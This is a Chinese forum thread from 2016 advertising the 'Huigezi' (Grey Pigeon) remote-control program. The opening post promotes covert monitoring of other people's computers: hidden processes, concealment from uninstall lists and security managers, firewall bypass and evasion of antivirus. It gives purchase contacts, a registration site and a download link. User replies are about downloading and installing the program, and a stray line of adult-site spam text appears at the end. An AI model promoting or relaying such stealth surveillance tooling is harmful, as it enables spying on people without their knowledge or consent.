灰鴿子遠程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 126355|回復: 398
打印 上一主題 下一主題

灰鴿子2017測試版!穿防火墻!無進程!無需映射!登陸即可控制異地電腦!殺毒友好!

  [復制鏈接]
跳轉到指定樓層
樓主
發表于 2016-6-5 13:05:53 | 只看該作者 |只看大圖 回帖獎勵 |倒序瀏覽 |閱讀模式
灰鴿子是公安部計算機信息系統安全專用產品,特許經營資質,真證,可查。名正言順,切實殺毒不殺。
支持1080P及更高分辨率的遠程桌面和攝像頭!隱藏進程,殺毒友好,穿透內網,穿透系統防火墻。


論壇導航有,就這里 http://www.zajdj.com/thread-45511-1-1.html 或【點這里轉到下載地址
未來會單獨出一款用戶知曉功能強大的不隱藏的遠程控制軟件或遠程協助產品供大伙免費使用。


灰鴿子支持純內網下使用:公司里要有一臺能連公網的電腦。需橋接端口,具體待購買之后我們會提供。
常見問題請點擊以下鏈接: 遠程桌面問題   安裝問題    購買價格 如何使用   收費版功能對比

[flash]

殺毒提交檢測需時間。如出現攔截員工請放行,或者等更新調整后重來此下載一遍最新版本也可。
支持隱蔽監控,系統自帶卸載列表、開始菜單、各種軟件管家、都是看不到的。只能授權卸載。
購買唯一QQ 834999498  電話 18363611417  座機:400-0011-054 軟件自帶注冊功能!

灰鴿子遠程控制軟件2018正式版下載地址.zip (377 Bytes, 下載次數: 41221)

評分

參與人數 12銀幣 +10 收起 理由
zhangsha1988 + 1 支持灰鴿子!
xiaoqiu12#4 + 1 支持灰鴿子!
2397922655 + 1
2549344741 + 1 666666666
p8362729 + 1 支持灰鴿子!
嬉笑笑笑 + 1 支持灰鴿子!
qq6551 + 1 支持灰鴿子!
終究 + 1 支持
蟹島 + 1 神馬都是浮云
a17515401116 + 1 支持灰鴿子!
huigezhi -1 支持灰鴿子!
叮當貓 + 1 支持灰鴿子!

查看全部評分

評帖賺銀幣(108) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏2
回復

使用道具 舉報

推薦
發表于 2016-6-6 10:57:34 | 只看該作者
沙發!~  很好!~下載試試
評帖賺銀幣(23) 收起
回復 支持 3 反對 0

使用道具 舉報

板凳
發表于 2016-6-26 19:04:25 | 只看該作者
不能注冊免費賬號怎么回事
評帖賺銀幣(12) 收起
回復 支持 反對

使用道具 舉報

地板
 樓主| 發表于 2016-6-26 20:59:22 | 只看該作者
墨子 發表于 2016-6-26 19:04
不能注冊免費賬號怎么回事

http://renzheng.hgzvip.net 去注冊一個即可。 不能注冊請點下驗證碼 或許因為您填寫時間長或者網絡卡導致驗證碼失效。或者您填寫的信息格式不對,實在不行找別人或者換個電腦注冊。
評帖賺銀幣(7) 收起
回復 支持 反對

使用道具 舉報

5#
發表于 2016-7-3 19:48:20 | 只看該作者
WOW 最新版本居然出來了哎 趕緊下一個
評帖賺銀幣(5) 收起
回復 支持 反對

使用道具 舉報

6#
發表于 2016-7-6 23:44:28 | 只看該作者
趕緊下一個2333333
評帖賺銀幣(2) 收起
回復 支持 反對

使用道具 舉報

7#
發表于 2016-7-7 18:27:19 | 只看該作者
:要好多啊,,,才能下
評帖賺銀幣(4) 收起
回復 支持 反對

使用道具 舉報

8#
發表于 2016-7-17 13:07:59 | 只看該作者
我電腦WIN7的64位的打不開
評帖賺銀幣(10) 收起
回復 支持 反對

使用道具 舉報

9#
發表于 2016-8-2 22:07:28 | 只看該作者
為什么不能解壓,他說你必須要從上一壓縮卷啟動解壓命令才能解壓
評帖賺銀幣(11) 收起
回復 支持 反對

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

Archiver|手機版|小黑屋|灰鴿子遠程控制軟件|灰鴿子遠程控制軟件 ( 魯ICP備14000061號 )

GMT+8, 2020-7-24 17:19 , Processed in 0.159143 second(s), 47 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回復 返回頂部 返回列表
亚洲美女视频高清播放-国内偷拍视频福利视频-99久久99九九视频免费-日本三级香港三级人妇